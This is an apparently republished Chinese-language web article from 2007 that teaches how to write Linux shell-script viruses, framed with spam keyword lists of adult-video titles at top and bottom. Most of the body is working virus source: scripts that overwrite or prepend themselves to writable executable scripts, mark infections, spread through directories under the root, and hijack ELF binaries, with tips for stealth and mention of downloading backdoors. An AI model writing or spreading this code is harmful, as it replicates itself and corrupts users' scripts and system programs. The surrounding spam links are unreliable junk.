国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

感染Linux系統腳本程序的病毒技術介紹
2007-08-01   

主要的Shell病毒技術
當然,本文需要你至少了解Linux Shell編程的基礎知識和一星點的病毒知識。OK!我們進入正題!
我們來看一個最原始的shell病毒,代碼最能說明問題: 

#shellvirus I 
for file in * 
do 
cp $0 $file 
done
簡單吧?遍歷當前文件系統的所有文件,然后覆蓋所有文件。但是,我們知道linux是多用戶的操作系統,它的文件是具有保護模式的,所以以上的腳本有可能會報出一大堆的錯誤,所以它很快就會被管理員發現并制止它的傳染。所以我們可以為該腳本做個判斷,這樣隱蔽性就大大增強了: 
#shellvirus II 
for file in * 
do 
if test -f $file 
then 
if test -x $file 
then 
if test -w $file 
then 
if grep -s echo $file >.mmm 
then 
cp $0 $file 
fi; fi; fi; fi; fi 
done 
rm .mmm -f
ok.我們改進了一下,加了若干的判斷,判斷文件是否存在,是否文件可執行,是否我們有權限寫,再判斷它是否是腳本程序如果是就cp $0 $file,所以這段代碼是感然該系統所有的腳本程序的,危害性還是比較大的。 
if grep -s echo $file>/.mmm
這句也可以這樣寫:
if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判斷file是否為shell腳本程序。但是,腳本病毒一旦在感染完畢之后就什么也不做了,它沒有象二進制病毒那樣的潛伏的危害性,而且以上的腳本只是簡單的覆蓋宿主而已,所以我這里利用了一下傳統的二進制病毒的感染機制,效果也不錯:),看看下面代碼: 
#infection 
head -n 24 $0 > .test<-取自身保存到.test 
for file in *<-遍歷文件系統 
do 
if test -f $file<-判斷是否為文件 
then 
if test -x $file<-判斷文件是否可執行 
then 
if test -w $file<-判斷文件是否可寫 
then 
if grep -s echo $file >.mmm<-判斷是否為腳本程序 
then 
head -n 1 $file >.mm<-提取要感染的腳本程序的第一行 
if grep -s infection .mm >.mmm<-判斷該文件是否已經被感染 
then 
rm -f .mm<-已經被感染,則跳過 
else<-還未被感染 
cat $file > .SAVEE<-很熟悉吧?借用了傳統的二進制文件的感染機制 
cat .test > $file 
cat .SAVEE >> $file 
fi; fi; fi; fi; fi 
done 
rm .test .SAVEE .mmm .mm -f
程序的注解足以說明了,其實增加了潛伏的危害性,但還是特容易被發現,沒辦法的事情,shell腳本一般都是明文的,呵呵。不過危害性已經相當大了.這段程序用了一個感染標志:infection來判斷是否已經被感染,著在程序中可以反應出來。
ok,為了使上面的代碼不容易被發現,我必須優化它,最先考慮的肯定是精練代碼: 
#infection 
for file in * ;do 
if test -f $file && test -x $file && test -w $file ; then 
if grep -s echo $file > /dev/nul ; then 
head -n 1 $file >.mm 
if grep -s infection .mm > /dev/nul ; then 
rm .mm -f ; else 
cat $file > .SAVEE 
head -n 13 $0 > $file 
cat .SAVEE >> $file 
fi; fi; fi 
done 
rm .SAVEE .mm -f
現在只有兩個臨時文件的產生了,代碼也被精簡到了13行.當然可以完全用;來把代碼甚至寫到1-2行,但這里我只是說明問題,就
不寫出來了.
好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因為大多
數有用的系統配置腳本都存放在那些目錄下,只要對上述代碼稍作改動就可以實現了:) 
#infection 
xtemp=$pwd<-保存當前路徑 
head -n 22 $0 > /.test 
for dir in /* ; do<-遍歷/目錄 
if test -d $dir ; then<-如果是目錄就cd該目錄 
cd $dir 
for file in * ; do<-遍歷該目錄文件 
if test -f $file && test -x $file && test -w $file ; then<-確定文件是否可執行,可寫 
if grep -s echo $file > /dev/nul ; then<-確定是否為腳本程序 
head -n 1 $file > .mm 
if grep -s infection .mm > /dev/nul ; then<-確定是否已經被感染 
rm .mm -f ; else 
cat $file > /.SAVEE<-和前面的感染機制一樣感染未被感染的腳本程序 
cat /.test > $file 
cat /.SAVEE >> $file 
fi; fi; fi 
done 
cd .. 
fi 
done 
cd $xtemp<-返回原目錄 
rm /.test /.SAVEE .mm -f
其實這段代碼只感染了/目錄下的一層目錄.當然我們可以使它感染的更深,只是加幾個循環而已.同樣shell病毒可以做很多事情
如download后門程序,為機器自動開后門,主動去攻擊聯網的其他機器,取用戶的email來發送傳染等等.總之它的實現技術不高深,
但也比較實用,還是值得去說明一下的,呵呵.
同樣,我們也可以感染elf文件,但危害性很小,這里不重點講,給個例程大家理解一下吧。 
for file in * ;do 
if test -f $file && test -x $file && test -w $file ; then 
if file $file | grep -s 'ELF' > /dev/nul ; then 
mv $file .$file 
head -n 9 $0 > $file 
fi; fi 
done 
.$0


熱詞搜索:

上一篇:IP安全加密 IPSec安全技術全面接觸(1)
下一篇:加固Linux服務器的絕招(1)

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
成人激情校园春色| 欧美日韩一区二区欧美激情| 91美女福利视频| 亚洲日本va午夜在线电影| 91丨porny丨蝌蚪视频| 亚洲综合久久av| 7777精品伊人久久久大香线蕉最新版| 视频一区二区三区中文字幕| 2021久久国产精品不只是精品| 国产成人精品三级麻豆| 亚洲国产综合在线| 日韩久久精品一区| 99久久久久免费精品国产| 亚洲午夜精品一区二区三区他趣| 欧美又粗又大又爽| 午夜精品一区二区三区三上悠亚| 26uuu色噜噜精品一区| 97精品电影院| 久久精品噜噜噜成人88aⅴ| 最新欧美精品一区二区三区| 91精品国产色综合久久不卡蜜臀 | 欧美成人一级视频| 日本电影亚洲天堂一区| 国产乱子伦视频一区二区三区| 夜色激情一区二区| 国产精品女主播在线观看| 日韩欧美在线网站| 欧美在线免费视屏| 成人免费黄色在线| 黑人巨大精品欧美黑白配亚洲| 亚洲综合成人在线| 中文字幕亚洲不卡| 国产丝袜在线精品| 日韩欧美区一区二| 欧美猛男超大videosgay| 97精品国产97久久久久久久久久久久| 国产一区二区三区黄视频| 日产国产欧美视频一区精品 | 国产精品国产三级国产普通话99| 日韩欧美久久久| 在线电影国产精品| 欧美欧美欧美欧美首页| 欧美无砖砖区免费| 欧美日韩在线播放| 91福利在线观看| 色婷婷精品大在线视频| 成人av在线一区二区三区| 成人爽a毛片一区二区免费| 久草在线在线精品观看| 美国十次了思思久久精品导航| 亚洲成人av一区二区| 亚州成人在线电影| 免费观看在线综合| 国产一区二区三区免费观看| 国产一区二区三区久久久| 国产精品一区二区不卡| 国产成人小视频| 99在线精品免费| 色天使色偷偷av一区二区| 日本道在线观看一区二区| 一本一道综合狠狠老| 欧美在线免费视屏| 337p亚洲精品色噜噜噜| 欧美不卡一二三| 国产蜜臀av在线一区二区三区| 中文字幕巨乱亚洲| 亚洲伦理在线免费看| 夜夜夜精品看看| 人人爽香蕉精品| 国产成都精品91一区二区三| eeuss影院一区二区三区| 在线观看日韩一区| 日韩一区二区中文字幕| 久久综合九色综合97婷婷| 国产精品欧美一级免费| 综合婷婷亚洲小说| 日韩经典中文字幕一区| 精品一区二区国语对白| 成人亚洲一区二区一| 欧美亚洲综合一区| 久久久久久亚洲综合影院红桃| 中文字幕一区二区视频| 性久久久久久久久久久久 | 久久99在线观看| 成人黄色电影在线| 欧美二区乱c少妇| 国产精品久久久久久久浪潮网站 | 一区二区三区日韩欧美| 日日夜夜精品免费视频| 欧美激情一区二区三区不卡| 欧美人与z0zoxxxx视频| 久久综合久久99| 亚洲欧洲av另类| 欧美老人xxxx18| 国产精品一级在线| 91麻豆免费观看| 日韩一区二区三区三四区视频在线观看 | 国产成人丝袜美腿| 欧美日韩在线播放一区| 国产精品视频麻豆| 老色鬼精品视频在线观看播放| 91麻豆国产在线观看| 精品国产1区2区3区| 亚洲一区在线观看视频| 国产99久久久久| 欧美mv日韩mv| 亚洲va国产天堂va久久en| 国产a级毛片一区| 精品少妇一区二区三区在线视频| 亚洲精品国产第一综合99久久| 国产激情一区二区三区桃花岛亚洲| 欧美亚州韩日在线看免费版国语版| 久久免费精品国产久精品久久久久| 视频一区二区三区在线| 在线观看日韩电影| 一级日本不卡的影视| 91亚洲精品久久久蜜桃| 国产精品午夜电影| 国产激情一区二区三区桃花岛亚洲| 精品人伦一区二区色婷婷| 日韩成人免费看| 欧美一区二区三区四区高清| 日韩经典中文字幕一区| 欧美一区二区福利在线| 日韩国产精品91| 69堂成人精品免费视频| 日韩中文字幕一区二区三区| 欧美精品一二三区| 三级欧美在线一区| 欧美午夜电影网| 午夜久久久久久电影| 欧美色电影在线| 日本91福利区| 日韩精品一区国产麻豆| 激情综合网av| 国产日韩一级二级三级| 成人丝袜18视频在线观看| 国产精品久久久久一区二区三区| 91影视在线播放| 亚洲国产美国国产综合一区二区| 欧美精品日日鲁夜夜添| 蜜臀久久99精品久久久画质超高清| 日韩精品在线一区| 岛国一区二区在线观看| 亚洲乱码中文字幕综合| 欧美久久久久久久久| 精彩视频一区二区| 国产精品嫩草久久久久| 91国产福利在线| 开心九九激情九九欧美日韩精美视频电影 | 久久精品夜夜夜夜久久| 粉嫩av一区二区三区| 一区二区三区中文字幕电影| 欧美日韩精品一区二区三区四区| 裸体一区二区三区| 国产人成一区二区三区影院| 色综合久久88色综合天天6| 青青草伊人久久| 国产精品久久777777| 欧美精品黑人性xxxx| 国产毛片精品视频| 亚洲一区二区三区在线看| 精品久久久久久久久久久久久久久 | 久久久av毛片精品| 色综合久久88色综合天天| 美女任你摸久久| 18欧美乱大交hd1984| 91精选在线观看| 色综合中文字幕| 国产成人在线网站| 日本免费新一区视频| 亚洲日本在线a| 久久精品人人做人人综合| 欧美午夜电影在线播放| 波多野结衣中文一区| 久久精品国产澳门| 一区二区国产盗摄色噜噜| 国产三级欧美三级日产三级99 | 在线观看精品一区| 国产精品一区二区你懂的| 午夜精品成人在线| 亚洲欧美国产77777| 久久久久久久久伊人| 777亚洲妇女| 欧美曰成人黄网| 91天堂素人约啪| 成人综合在线视频| 国产乱人伦精品一区二区在线观看| 亚洲一级二级三级| 亚洲精品视频自拍| 亚洲视频 欧洲视频| 国产精品久久午夜| 久久久久国产精品麻豆| 精品国产sm最大网站| 精品国产露脸精彩对白| 日韩视频国产视频| 日韩午夜中文字幕| 日韩免费看的电影| 日韩三级电影网址| 精品国精品自拍自在线|